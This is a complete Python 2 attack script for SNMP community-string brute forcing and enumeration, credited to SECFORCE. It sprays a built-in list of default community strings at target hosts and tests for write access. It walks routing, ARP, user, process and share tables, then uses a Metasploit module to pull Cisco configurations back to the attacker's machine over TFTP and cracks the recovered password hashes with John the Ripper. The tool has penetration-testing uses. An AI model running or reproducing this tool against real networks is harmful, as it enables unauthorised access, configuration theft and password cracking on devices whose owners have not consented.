SNMP Bruteforcer By Aluf

1. #!/usr/bin/env python
2. # Requires metasploit, snmpwalk, snmpstat and John the Ripper
3.  
4. # SNMP Bruteforce & Enumeration Script
5. # http://www.secforce.com / nikos.vassakis <at> secforce.com
6. # ##########################################################
7. __version__ = 'v1.0b'
8.  
9. from socket import socket, SOCK_DGRAM, AF_INET, timeout
10. from random import randint
11. from time import sleep
12. import optparse, sys, os
13. from subprocess import Popen, PIPE
14. import struct
15. import threading, thread
16. import tempfile
17.  
18. from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
19. SNMPset, SNMPbulk, IP)
20.  
21. ##########################################################################################################
22. # Defaults
23. ##########################################################################################################
24. class defaults:
25. rate=250.0
26. timeOut=1.0
27. port=161
28. delay=2
29. interactive=True
30. verbose=False
31. getcisco=True
32. colour=True
33.  
34. default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
35.  
36. ##########################################################################################################
37. # OID's
38. ##########################################################################################################
39. ''' Credits
40. Some OID's borowed from Cisc0wn script
41. # Cisc0wn - The Cisco SNMP 0wner.
42. # Daniel Compton
43. # www.commonexploits.com
44. # [email protected]
45. '''
46.  
47. RouteOIDS={
48. 'ROUTDESTOID': [".1.3.6.1.2.1.4.21.1.1", "Destination"],
49. 'ROUTHOPOID': [".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
50. 'ROUTMASKOID': [".1.3.6.1.2.1.4.21.1.11", "Mask"],
51. 'ROUTMETOID': [".1.3.6.1.2.1.4.21.1.3", "Metric"],
52. 'ROUTINTOID': [".1.3.6.1.2.1.4.21.1.2", "Interface"],
53. 'ROUTTYPOID': [".1.3.6.1.2.1.4.21.1.8", "Route type"],
54. 'ROUTPROTOID': [".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
55. 'ROUTAGEOID': [".1.3.6.1.2.1.4.21.1.10", "Route age"]
56. }
57.  
58. InterfaceOIDS={
59. #Interface Info
60. 'INTLISTOID': [".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
61. 'INTIPLISTOID': [".1.3.6.1.2.1.4.20.1.1", "IP address"],
62. 'INTIPMASKOID': [".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
63. 'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
64. }
65.  
66. ARPOIDS={
67. # Arp table
68. 'ARPADDR': [".1.3.6.1.2.1.3.1 ","ARP address method A"],
69. 'ARPADDR2': [".1.3.6.1.2.1.3.1 ","ARP address method B"]
70. }
71.  
72. OIDS={
73. 'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
74. }
75.  
76. snmpstat_args={
77. 'Interfaces':["-Ci","Interface Info"],
78. 'Routing':["-Cr","Route Info"],
79. 'Netstat':["","Netstat"],
80. #'Statistics':["-Cs","Stats"]
81. }
82.  
83. '''Credits
84. The following OID's are borrowed from snmpenum.pl script
85. # ----by filip waeytens 2003----
86. # ---- DA SCANIT CREW www.scanit.be ----
87. # [email protected]
88. '''
89.  
90. WINDOWS_OIDS={
91. 'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
92. 'INSTALLED SOFTWARE': ["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
93. 'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
94. 'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
95. 'DOMAIN': ["1.3.6.1.4.1.77.1.4.1","Domain"],
96. 'USERS': ["1.3.6.1.4.1.77.1.2.25","Users"],
97. 'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
98. 'SHARES': ["1.3.6.1.4.1.77.1.2.27","Shares"],
99. 'DISKS': ["1.3.6.1.2.1.25.2.3.1.3","Disks"],
100. 'SERVICES': ["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
101. 'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
102. 'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
103. }
104.  
105. LINUX_OIDS={
106. 'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
107. 'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
108. 'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
109. 'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
110. 'MOUNTPOINTS': ["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
111. 'RUNNING SOFTWARE PATHS': ["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
112. 'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
113. 'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
114. }
115.  
116. CISCO_OIDS={
117. 'LAST TERMINAL USERS': ["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
118. 'INTERFACES': ["1.3.6.1.2.1.2.2.1.2","Interfaces"],
119. 'SYSTEM INFO': ["1.3.6.1.2.1.1.1","System Info"],
120. 'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
121. 'SNMP Communities': ["1.3.6.1.6.3.12.1.3.1.4","Communities"],
122. 'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
123. 'IP ADDRESSES': ["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
124. 'INTERFACE DESCRIPTIONS': ["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
125. 'HARDWARE': ["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
126. 'TACACS SERVER': ["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
127. 'LOG MESSAGES': ["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
128. 'PROCESSES': ["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
129. 'SNMP TRAP SERVER': ["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
130. }
131.  
132. ##########################################################################################################
133. # Classes
134. ##########################################################################################################
135.  
136. class SNMPError(Exception):
137. '''Credits
138. Class copied from sploitego project
139. __original_author__ = 'Nadeem Douba'
140. https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
141. '''
142. pass
143.  
144. class SNMPVersion:
145. '''Credits
146. Class copied from sploitego project
147. __original_author__ = 'Nadeem Douba'
148. https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
149. '''
150. v1 = 0
151. v2c = 1
152. v3 = 2
153.  
154. @classmethod
155. def iversion(cls, v):
156. if v in ['v1', '1']:
157. return cls.v1
158. elif v in ['v2', '2', 'v2c']:
159. return cls.v2c
160. elif v in ['v3', '3']:
161. return cls.v3
162. raise ValueError('No such version %s' % v)
163.  
164. @classmethod
165. def sversion(cls, v):
166. if not v:
167. return 'v1'
168. elif v == 1:
169. return 'v2c'
170. elif v == 2:
171. return 'v3'
172. raise ValueError('No such version number %s' % v)
173.  
174. class SNMPBruteForcer(object):
175. #This class is used for the sploitego method of bruteforce (--sploitego)
176. '''Credits
177. Class copied from sploitego project
178. __original_author__ = 'Nadeem Douba'
179. https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
180. '''
181. def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
182. self.version = SNMPVersion.iversion(version)
183. self.s = socket(AF_INET, SOCK_DGRAM)
184. self.s.settimeout(timeout)
185. self.addr = (agent, port)
186. self.rate = rate
187.  
188. def guess(self, communities):
189.  
190. p = SNMP(
191. version=self.version,
192. PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
193. )
194. r = []
195. for c in communities:
196. i = randint(0, 2147483647)
197. p.PDU.id = i
198. p.community = c
199. self.s.sendto(str(p), self.addr)
200. sleep(1/self.rate)
201. while True:
202. try:
203. p = SNMP(self.s.recvfrom(65535)[0])
204. except timeout:
205. break
206. r.append(p.community.val)
207. return r
208.  
209. def __del__(self):
210. self.s.close()
211.  
212. class SNMPResults:
213. addr=''
214. version=''
215. community=''
216. write=False
217.  
218. def __eq__(self, other):
219. return self.addr == other.addr and self.version == other.version and self.community == other.community
220.  
221. ##########################################################################################################
222. # Colour output functions
223. ##########################################################################################################
224.  
225. # for color output
226. BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
227.  
228. #following from Python cookbook, #475186
229. def has_colours(stream):
230. if not hasattr(stream, "isatty"):
231. return False
232. if not stream.isatty():
233. return False # auto color only on TTYs
234. try:
235. import curses
236. curses.setupterm()
237. return curses.tigetnum("colors") > 2
238. except:
239. # guess false in case of error
240. return False
241. has_colours = has_colours(sys.stdout)
242.  
243. def printout(text, colour=WHITE):
244.  
245. if has_colours and defaults.colour:
246. seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
247. sys.stdout.write(seq)
248. else:
249. #sys.stdout.write(text)
250. print text
251.  
252.  
253. ##########################################################################################################
254. #
255. ##########################################################################################################
256.  
257. def banner(art=True):
258. if art:
259. print >> sys.stderr, " _____ _ ____ _______ ____ __ "
260. print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
261. print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
262. print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
263. print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
264. print >> sys.stderr, ""
265. print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
266. print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
267. print >> sys.stderr, "###############################################################"
268. print >> sys.stderr, ""
269.  
270. def listener(sock,results):
271. while True:
272. try:
273. response,addr=SNMPrecv(sock)
274. except timeout:
275. continue
276. except KeyboardInterrupt:
277. break
278. except:
279. break
280. r=SNMPResults()
281. r.addr=addr
282. r.version=SNMPVersion.sversion(response.version.val)
283. r.community=response.community.val
284. results.append(r)
285. printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
286.  
287. def SNMPrecv(sock):
288. try:
289. recv,addr=sock.recvfrom(65535)
290. response = SNMP(recv)
291. return response,addr
292. except:
293. raise
294.  
295. def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
296. addr = (ip, port)
297. for packet in packets:
298. i = randint(0, 2147483647)
299. packet.PDU.id = i
300. packet.community = community
301. sock.sendto(str(packet), addr)
302. sleep(1/rate)
303.  
304. def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
305. s = socket(AF_INET, SOCK_DGRAM)
306. s.settimeout(TimeOut)
307. response=''
308. r=result
309.  
310. version = SNMPVersion.iversion(r.version)
311. if value:
312. p = SNMP(
313. version=version,
314. PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
315. )
316. else:
317. p = SNMP(
318. version=version,
319. PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
320. )
321.  
322. SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
323. for x in range(0, 5):
324. try:
325. response,addr=SNMPrecv(s)
326. break
327. except timeout: # if request times out retry
328. sleep(0.5)
329. continue
330. s.close
331. if not response:
332. raise timeout
333. return response
334.  
335. def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
336. #Alt .1.3.6.1.2.1.1.5.0
337.  
338. setval='HASH(0xDEADBEF)'
339. for r in results:
340. try:
341. originalval=SNMPRequest(r,OID)
342.  
343. if originalval:
344. originalval=originalval[SNMPvarbind].value.val
345.  
346. SNMPRequest(r,OID,setval)
347. curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
348.  
349. if curval == setval:
350. r.write=True
351. try:
352. SNMPRequest(r,OID,originalval)
353. except timeout:
354. pass
355. if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
356. curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
357. if curval != originalval:
358. printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
359. else:
360. if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
361. else:
362. r.write=None
363. printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
364. except timeout:
365. r.write=None
366. printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
367. continue
368.  
369. def generic_snmpwalk(snmpwalk_args,oids):
370. for key, val in oids.items():
371. try:
372. printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
373. entry={}
374. out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
375.  
376. print '\tINFO'
377. print '\t----\t'
378. for i in out:
379. print '\t',i.strip()
380. print '\n'
381. except KeyboardInterrupt:
382. pass
383.  
384. def enumerateSNMPWalk(result,options):
385. r=result
386.  
387. snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
388.  
389. ############################################################### Enumerate OS
390. if options.windows:
391. generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
392. return
393. if options.linux:
394. generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
395. return
396. if options.cisco:
397. generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
398.  
399. ############################################################### Enumerate CISCO Specific
400. ############################################################### Enumerate Routes
401. entry={}
402. out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
403. lines = len(out)
404.  
405. printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
406. try:
407. for key, val in RouteOIDS.items(): #Enumerate Routes
408. #print '\t *',val[1], val[0]
409. out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
410.  
411. entry[val[1]]=out
412.  
413.  
414. print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
415. print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
416. for j in range(lines):
417. print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
418. '\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
419. '\t'+entry['Mask'][j].strip().ljust(12,' ') +
420. '\t\t'+entry['Metric'][j].strip().center(6,' ') +
421. '\t'+entry['Interface'][j].strip().center(10,' ') +
422. '\t'+entry['Route type'][j].strip().center(4,' ') +
423. '\t'+entry['Route protocol'][j].strip().center(8,' ') +
424. '\t'+entry['Route age'][j].strip().center(3,' ')
425. )
426. except KeyboardInterrupt:
427. pass
428.  
429. ############################################################### Enumerate Arp
430. print '\n'
431. for key, val in ARPOIDS.items():
432. try:
433. printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
434. entry={}
435. out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
436.  
437. lines=len(out)/3
438.  
439. entry['V']=out[0*lines:1*lines]
440. entry['MAC']=out[1*lines:2*lines]
441. entry['IP']=out[2*lines:3*lines]
442.  
443.  
444. print '\tIP\t\tMAC\t\t\tV'
445. print '\t--\t\t---\t\t\t--'
446. for j in range(lines):
447. print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
448. '\t'+entry['MAC'][j].strip().ljust(18,' ') +
449. '\t'+entry['V'][j].strip().ljust(2,' ')
450. )
451. print '\n'
452. except KeyboardInterrupt:
453. pass
454.  
455. ############################################################### Enumerate SYSTEM
456. for key, val in OIDS.items():
457. try:
458. printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
459. entry={}
460. out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
461.  
462. print '\tINFO'
463. print '\t----\t'
464. for i in out:
465. print '\t',i.strip()
466. print '\n'
467. except KeyboardInterrupt:
468. pass
469. ############################################################### Enumerate Interfaces
470. for key, val in snmpstat_args.items():
471. try:
472. printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
473. out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
474.  
475. for i in out:
476. print '\t',i.strip()
477. print '\n'
478. except KeyboardInterrupt:
479. pass
480.  
481. def get_cisco_config(result,options):
482. printout(('################## Trying to get config with: %s'% result.community),YELLOW)
483.  
484. identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
485.  
486. if options.interactive:
487. Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
488. else:
489. Local_ip = identified_ip.strip()
490.  
491. if not (os.path.isdir("./output")):
492. os.popen('mkdir output')
493.  
494. p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
495.  
496.  
497. print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
498.  
499. out=[]
500. while p.poll() is None:
501. line=p.stdout.readline()
502. out.append(line)
503. print '\t',line.strip()
504.  
505. printout('################## Passwords Found:',YELLOW)
506. encrypted=[]
507. for i in out:
508. if "Password" in i:
509. print '\t',i.strip()
510. if "Encrypted" in i:
511. encrypted.append(i.split()[-1])
512.  
513. if encrypted:
514. print '\nCrack encrypted password(s)?'
515. for i in encrypted:
516. print '\t',i
517.  
518. #if (False if raw_input("(Y/n):").lower() == 'n' else True):
519. if not get_input("(Y/n):",'n',options):
520.  
521. with open('./hashes', 'a') as f:
522. for i in encrypted:
523. f.write(i+'\n')
524.  
525. p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
526. while p.poll() is None:
527. print '\t',p.stdout.readline()
528. print 'Passwords Cracked:'
529. out=os.popen('john ./hashes --show').readlines()
530. for i in out:
531. print '\t', i.strip()
532.  
533. out=[]
534. while p.poll() is None:
535. line=p.stdout.readline()
536. out.append(line)
537. print '\t',line.strip()
538.  
539. def select_community(results,options):
540. default=None
541. try:
542. printout("\nIdentified Community strings",WHITE)
543.  
544. for l,r in enumerate(results):
545. if r.write==True:
546. printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
547. default=l
548. elif r.write==False:
549. printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
550. else:
551. printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
552.  
553. if default is None:
554. default = l
555.  
556. if not options.enum:
557. return
558.  
559. if options.interactive:
560. selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
561. if not selection:
562. selection=default
563. else:
564. selection=default
565.  
566. try:
567. return results[int(selection)]
568. except:
569. return results[l]
570. except KeyboardInterrupt:
571. exit(0)
572.  
573. def SNMPenumeration(result,options):
574. getcisco=defaults.getcisco
575. try:
576. printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
577. enumerateSNMPWalk(result,options)
578.  
579. if options.windows or options.linux:
580. if not get_input("Get Cisco Config (y/N):",'y',options):
581. getcisco=False
582. if getcisco:
583. get_cisco_config(result,options)
584. except KeyboardInterrupt:
585. print '\n'
586. return
587.  
588. def password_brutefore(options, communities, ips):
589. s = socket(AF_INET, SOCK_DGRAM)
590. s.settimeout(options.timeOut)
591.  
592. results=[]
593.  
594. #Start the listener
595. T = threading.Thread(name='listener', target=listener, args=(s,results,))
596. T.start()
597.  
598. # Craft SNMP's for both versions
599. p1 = SNMP(
600. version=SNMPVersion.iversion('v1'),
601. PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
602. )
603. p2c = SNMP(
604. version=SNMPVersion.iversion('v2c'),
605. PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
606. )
607.  
608. packets = [p1, p2c]
609.  
610. #We try each community string
611. for i,community in enumerate(communities):
612. #sys.stdout.write('\r{0}'.format('.' * i))
613. #sys.stdout.flush()
614. for ip in ips:
615. SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
616.  
617. #We read from STDIN if necessary
618. if options.stdin:
619. while True:
620. try:
621. try:
622. community=raw_input().strip('\n')
623. for ip in ips:
624. SNMPsend(s, packets, ip, options.port, community, options.rate)
625. except EOFError:
626. break
627. except KeyboardInterrupt:
628. break
629.  
630. try:
631. print "Waiting for late packets (CTRL+C to stop)"
632. sleep(options.timeOut+options.delay) #Waiting in case of late response
633. except KeyboardInterrupt:
634. pass
635. T._Thread__stop()
636. s.close
637.  
638. #We remove any duplicates. This relies on the __equal__
639. newlist = []
640. for i in results:
641. if i not in newlist:
642. newlist.append(i)
643. return newlist
644.  
645. def get_input(string,non_default_option,options):
646. #(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
647.  
648. if options.interactive:
649. if raw_input(string).lower() == non_default_option:
650. return True
651. else:
652. return False
653. else:
654. print string
655. return False
656.  
657. def main():
658.  
659. parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
660.  
661. parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
662. #parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
663. parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
664. parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
665. parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
666.  
667.  
668. groupAlt = optparse.OptionGroup(parser, "Alternative Options")
669. groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
670. groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
671. groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
672.  
673.  
674. groupAuto = optparse.OptionGroup(parser, "Automation")
675. groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
676. groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
677. groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
678.  
679. groupAdvanced = optparse.OptionGroup(parser, "Advanced")
680. groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
681. groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
682. groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
683.  
684. groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
685. groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
686.  
687. groupOS = optparse.OptionGroup(parser, "Operating Systems")
688. groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
689. groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
690. groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
691.  
692. parser.add_option_group(groupAdvanced)
693. parser.add_option_group(groupAuto)
694. parser.add_option_group(groupOS)
695. parser.add_option_group(groupAlt)
696.  
697. (options, arguments) = parser.parse_args()
698.  
699. communities=[]
700. ips=[]
701.  
702. banner(options.colour) #For SPARTA!!!
703.  
704. if not options.ip and not options.lfile:
705. #Can't continue without target
706. parser.print_help()
707. exit(0)
708. else:
709. # Create the list of targets
710. if options.lfile:
711. try:
712. with open(options.lfile) as t:
713. ips = t.read().splitlines() #Potential DoS
714. except:
715. print "Could not open targets file: " + options.lfile
716. exit(0)
717. else:
718. ips.append(options.ip)
719.  
720. if not options.colour:
721. defaults.colour=False
722.  
723. # Create the list of communities
724. if options.dictionary: # Read from file
725. with open(options.dictionary) as f:
726. communities=f.read().splitlines() #Potential DoS
727. elif options.community: # Single community
728. communities.append(options.community)
729. elif options.stdin: # Read from input
730. communities=[]
731. else: #if not options.community and not options.dictionary and not options.stdin:
732. communities=default_communities
733.  
734. #We ensure that default communities are included
735. #if 'public' not in communities:
736. # communities.append('public')
737. #if 'private' not in communities:
738. # communities.append('private')
739.  
740. if options.stdin:
741. options.interactive=False
742.  
743. results=[]
744.  
745. if options.stdin:
746. print >> sys.stderr, "Reading input for community strings ..."
747. else:
748. print >> sys.stderr, "Trying %d community strings ..." % len(communities)
749.  
750. if options.sploitego: #sploitego method of bruteforce
751. if ips:
752. for ip in ips:
753. for version in ['v1', 'v2c']:
754. bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
755. result=bf.guess(communities)
756. for i in result:
757. r=SNMPResults()
758. r.addr=(ip,options.port)
759. r.version=version
760. r.community=i
761. results.append(r)
762. print ip, version+'\t',result
763. else:
764. parser.print_help()
765.  
766. else:
767. results = password_brutefore(options, communities, ips)
768.  
769. #We identify whether the community strings are read or write
770. if results:
771. printout("\nTrying identified strings for READ-WRITE ...",WHITE)
772. testSNMPWrite(results,options)
773. else:
774. printout("\nNo Community strings found",RED)
775. exit(0)
776.  
777. #We attempt to enumerate the router
778. while options.enum:
779. SNMPenumeration(select_community(results,options),options)
780.  
781. #if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
782. if get_input("Enumerate with different community? (y/N):",'y',options):
783. continue
784. else:
785. break
786.  
787. if not options.enum:
788. select_community(results,options)
789.  
790. print "Finished!"
791.  
792. if __name__ == "__main__":
793. main()